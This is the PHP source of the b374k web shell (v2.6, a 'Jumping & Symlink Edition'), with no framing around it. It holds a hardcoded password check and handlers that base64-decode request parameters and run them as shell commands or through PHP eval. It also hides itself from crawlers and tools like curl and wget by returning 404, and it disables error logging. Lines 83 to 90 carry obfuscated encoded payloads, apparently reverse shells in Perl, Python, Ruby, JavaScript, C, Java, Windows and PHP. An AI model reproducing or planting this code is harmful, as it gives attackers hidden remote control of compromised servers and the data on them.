date

1. <?php
2.  
3. // b374k Shell v2.6 4m4t3r45u
4. // Recoded By Andripzf
5. // Jumping & Symlink Edition
6.  
7. $s_pass = "8ea906d35b500aa4a7dd4583e4024c8f"; // T_T
8. $s_ver = "2.6";
9. $s_title = "b374k ".$s_ver;
10. $s_login_time = 3600 * 24 * 7;
11. $s_debug = false;
12.  
13. @ob_start();
14. @set_time_limit(0);
15. @ini_set('html_errors','0');
16. @clearstatcache();
17. if($s_debug){
18. error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
19. @ini_set('display_errors','1');
20. @ini_set('log_errors','1');
21. }
22. else{
23. error_reporting(0);
24. @ini_set('display_errors','0');
25. @ini_set('log_errors','0');
26. }
27.  
28. $s_auth = false;
29. if(strlen(trim($s_pass))>0){
30. if(isset($_COOKIE['b374k'])){
31. if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
32. }
33. if(isset($_REQUEST['login'])){
34. $s_login = strtolower(md5(trim($_REQUEST['login'])));
35. if(strtolower(trim($s_pass)) == $s_login){
36. setcookie("b374k",$s_login,time() + $s_login_time);
37. $s_auth = true;
38. }
39. }
40.  
41. if(isset($_REQUEST['x']) && ($_REQUEST['x']=='logout')){
42. $persist = array("theme","cwd");
43. $s_reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";
44. foreach($_COOKIE as $s_k=>$s_v){
45. if(!in_array($s_k, $persist)) if(!is_array($s_k)) setcookie($s_k,"",time() - $s_login_time);
46. }
47. $s_auth = false;
48. if(!empty($s_reload)) header("Location: ".$s_reload);
49. }
50. }
51. else $s_auth = true;
52.  
53. if(!empty($_REQUEST['s_pass'])){
54. if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){
55. if(isset($_REQUEST['cmd'])){
56. $s_cmd = base64_decode($_REQUEST['cmd']);
57. echo exe($s_cmd);
58. }
59. elseif(isset($_REQUEST['eval'])){
60. $s_code = base64_decode($_REQUEST['eval']);
61. ob_start();
62. eval($s_code);
63. $s_res = ob_get_contents();
64. ob_end_clean();
65. echo $s_res;
66. }
67. else echo $s_title;
68. }
69. die();
70. }
71.  
72. if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
73. header("HTTP/1.0 404 Not Found");
74. header("Status: 404 Not Found");
75. die();
76. }
77. elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
78. header("HTTP/1.0 404 Not Found");
79. header("Status: 404 Not Found");
80. die();
81. }
82.  
83. $s_rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
84. $s_rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
85. $s_rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
86. $s_rs_js = "nVHLasMwEDwrkH8wvliGVIImUEjIqZ/QY/rAkTeWqCy5kpwUQv69kuykebSl2Afh3Zmd3Z2lNOHONXZOKdMlkErrSgJhuqYNXU8fZu93loOUdDzaFiaxTbFTyTIx8NEKAzhjXMjyrTGagbVZTiJh0ZEVuHOqD7O8h6wzUNTnaJc5EZhWVku4aNWlIqVXCZN5SkbXQlHLM4+IDe6nIY0s3EabmtSFYxzT151niTz/rmN1SeATQl3SSRam2nrkKBHCTjT8EQmqcny5nOb78QgFPvdkvxhhfnoHT2C2YPCmVcwJrbCNPGTJzggHOI2G9u3nYUcFzEH5rNKwVNJ/3WpeOJqJI/0ct5xYVwpFDNi2BpxfQ7p1xHdPy8IV6eQ4TYJDnO+P08RocbhVBmMGlv9Vdhz6php1LydSWAcqOr26fwnJw3gE0kJy7f/s5L+98P+xczRY36tM4kVX0yj330Og3y6AfrAeDfQcDTQbDXP58AU=";
87. $s_rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
88. $s_rs_java = "lVRNb9swDD2nQP+DkJM9ZHaTDdjWIsOwYYcBA1osvXXBoMiMrdWWBIn5Qpr/PkqWXXftpQfbEvlEPj5SznNWIRp3medCF5CVWpc1ZEI3uclX7z68v3/rKqjr/PxMNkZbZH/5lmdSZ2+unpoUYLCdn5nNqpaCiZo7x0KMP9Ydz89GxsotR2AOORJgLRWvI8wggz2CKhy7rSzwwuP7Az+U2eACyd4w6a6GrusNPvr0BgMDcrccDCZPz06eHUiPWEmXSTenyGFJxrmPdGpDfbnegrWygEHcrZYFsxuVpIHnCO2hXYxWB4S7JVuxOVOwY2H7cfpptrxq/VIhE+SkPL7MZJVGx66SNSTi8/wiZTHWiFhkOysRktXkYiI6aLCv642rkt70YsxT+LRvwVFUyfe9AINSKwbpETJSUZEWXNzfWi6AwgWwf7XVx3pjx0LZDZcqIf2kKqlQbkvXiuAr8+MQcrd+JpqCeI3zlVS5q8bBJdfJ4uAQmqwEvLHagMVDMtYuU7yBcZqh/ql3YL9xR4QyqQrYX6+T8U6qcerlOcao9Bm3fGO2nbeGgWNhaNklE1opEAjFb9VmH/Rn5wl8pb2LMi60uAdkVexdu42+vsNE39ec1aBKrObzaRyBUbgKc5pVhBJsZrh1QJuAvrtYdj1ZgKV5iqlcl2pgTHygDu25uIwL37Wu2W0/oXbA/iczey2ZVjhpCBtc0+Ug8UAEaSZswOv0shTs4YG9zGd4C0vpy668+gNzP8pPLmipe+zQ3oPJ392QzkQjJcD/Uujgr41C2YA/Hpc0UbAHkdDwpPFfQWrR5E5jwaSzeUZt4ol0CTx69ogu/V/FPGfYw6cZXR/r22dm/fJRxvB6xe2k5/QP";
89. $s_rs_win = "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";
90. $s_rs_php = "7VVNb+M2ED3bgP+DlhUQCVUsyy6wQFxmL+2xwKIt0MMmFWSKsghLIsuhai+a/PcORcnWOk6yaLe9tDBikzOcx/l4fPn2nSrVbPqVVxqj4CaOmcz5fCvltuJzJutYxZvV229211DyqopnU6611KnmSmojmm2wCNezKXCTGlHztBK1MM4mN6moVSWYMGlRtVAG1jqb+ibTW26oD6kGt14frUD5QVWYQkA8EvVGG+czoMlq9dYu9xlt2qqyS35aQkkJBmNa3s/f//gDPRiu6/X7nxJ6dee//+W726t170bbOt6IJobSuxbEBteUdGV6XZnejcdk03BmeH7XkC5tUQRMto0JhkxDSpPwj9l04ivqH+uY+JgG6RYGMUWT280j9q0CfgljeYYBHxb3Pc7RktwfATO26wG7lIq2YUbIJuUHAQaCK8UaU6WF1LursEcWOT1ZuyFMMLKz0+skxEgTJGOzMy0Gk5IgDimOGEQehGcxQyKYXF+uuxUoGM2zOgXJdsgO4Pp3rgNimEKSLebd54bMfRX5SKlGdj8Y0906xPa0ki22DKKVS8lnZ9gZY1zZE0PG6Dayknu8ENoN7gIkedo2Wc2DMFpEqxDLIHvRuGQnxV4LwwOfRX49x46zPRY6J7ekA5zsS1GhV72htMhwjC7Izqyw48E4d65rlubbtM4MKwMSs/zOCz78egf3X4exQD5jsVqHffzEz3OK+368Ll5AmgsdoCsMWTkse78v6Tg7Z33svnt6GS3qcfm+6kq18yLew4P3jP+3Fv2ht8Gu7tZHPA/v4wdbOV6H72D+9PJR56TLskunYJUEfmzMsHUDsics/JPWu8N+DjTTOvsYLOitWxAlFCcR0SSMknPjHo3LC8YeTWmqtGSpVLzBDMoI8XEQQjk/9uwN9lxzkK1mtlacz+hJjKm4qZBvVvNsOD7TaPHKkeT1I8uXj7DB6zhodDuwzz5+Lgvb44cHt3JXhuFojL7O+mbaDvc59Rf3rDreW6HeBRgQocDia8wiq6wnZosmPSHp7MRiQQtEyDs7g4Grw2D7VvkiHNP1E7whrYugg/MpMnsVdPkS6PKzQB/P+Dti9rB0FX66T872Q7c7Kg52PTyH078HJ6NW5AcZLazIOfKWnYDwBv+OYvg31A7+otrBf17t4LLavSBv8L+8XToCr8sbfKa8wReTN3hGNODflTf4J+TtHPQ5efsimvbu9k8=";
91. $s_favicon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAKYSURBVDjLnZPJT1NRFMb5G1wDHV5boNiqdHrvFYolCAtsGSSWKpMFKhYqlDI6oAEKaVJwCIgSphaKtLYWCgSNBgRjMNHoxsSFS3cmJmA0NMTw+R6JKKZl4eJL7sm953fOd3JPHIC4WMpcppG5SGnZc8ZjVVF6QLn975sDgfaZmvg71oRJZIRUYcuAnq/2KWroGfm3QwEn2YpLVPPvOD2oiqj9yq/mGznegl56mx6T7ZbY1M6YAM0CuZkxT0b2Wg6QW/SsApRXDsotR+d6E9Y/h9DuqoCuJq0lKoDxqU1/pITGR27mBU4h+GEcTz5OY+ClA5JbyahYzof/9TBO9B/FcWcqpA4xU3We3GJ87ntnfO5meinMvruNnqcmXA2XoDVcCc0wCYkzBaZpA7ILRJ/2O2B87jA+QT9UeDRe8svZYAG8b/txc6kc9mA+yqayYPQXwvdmBEOrA5B2p0BtFIYOWKCm5RukWwZyXIbA+0F0LpaiKaBHmVsLw4we99ccsM8a8GClF5JOMcQdou8prULrgRmQo7KI0VcE13MrGv06lE5kodhzGvdWu2GdKkTVWC4DcELcJkKyXbCb1EhAVM//M0DVUNqP2qAJd1baUDaZjTMTeXAttsPi0cM0mgvHvA0NkxYk2QRIrieOsDmEmXttH0DfVfSluSToWmpD8bgOroUOWNw6VI7koGfOBuq6EqLLTNU6ojrmP5D1HVsjmrkYezGIrlA9LjKgnrlGXJlpgbCOD0EtD0QNN8I3cZqjAlhJr4rXpB1iNLhrYffUQWoT7yUKzbxqJlHLq0jc5JYmgHMunogKYJVqF7mTrPyfgktMRTMX/CrOq1gLF3fYNrLiX+Bs8MoTwT2fQPwXgBXHGL+TaIjfinb3C7cscRMIcYL6AAAAAElFTkSuQmCC";
92. $s_dark_cb = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAAeCAYAAADzXER0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAASdJREFUeNrsk0GKwjAYhZNJqYviQpDKLOcY3sOFIF5DFF0KgjeYAwizmDuNOxHcFrGlje9pA1KbNOqshvnh2YD58v6m75dxHIdCiAk0gt5Fc+2gDbQO8DNTSk1D1BtKSikoWxVF0U7TdJ5lmSI8BtfCARKsoFyw1poeLcBjwl0aEgqCwAma4n5yhC+AceSzqdD69RAD+zjedSBeqH/4CfiA74bgaG+o3HxQURR1sOgjnqpMDv+0ikZJkpzyPP9kwlbIaQgNsO55GO+hb2hp3vnI1Hl2XZT7xe+PJNbWYWgcyao7L+p22h4ayephdyPJVl3v+jFcuhNmg+tAazxvN9tA86m83H6+Fm5n3mpd49sSlDaYN3jJb8WFazMy2rftujb/yEieBRgAZHG/OeGef6MAAAAASUVORK5CYII=";
93. $s_bright_cb = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAAeCAYAAADzXER0AAAACXBIWXMAAAsSAAALEgHS3X78AAABP0lEQVQ4je2TsUoDQRCGv5m93RRBLBIQO/NOFgHJa4iiZUDwNUSx8J0s5SCFkkJy3M5aJBfwLrm7oI3gD8sWO9/+O+z8kud5AC6BC+CUbr0Bj8B9BlzHGK+KoghmpiklUkp7SVU9CiHceO9dBsyKohjEGMXMMLNWWETUzAbe+1kGjM1MzIyyLFvBSmYmwDgDSCltHc2sE1bV9V7BfRwblxxM/MM/gxeqmkSkNyQiCVgo8BBCWDnnkoigqq3LOZeGw+EKeMqAO+998N6fAyc9jHPgBZhXPX8C3XO5lm3q+f1Ixhh3QUCPSNbdReRb2g6KZP2yRiRjjK29vj7fNlupO/QFG/Cu4n0grL+ql9tkOm93FhF2PfxsA9bPtrCqIiJIzWUynVNFph4dyfP8fblcHpdlSTUkXVJVRqPRxx+N5BfD5OFvXtL9jAAAAABJRU5ErkJggg==";
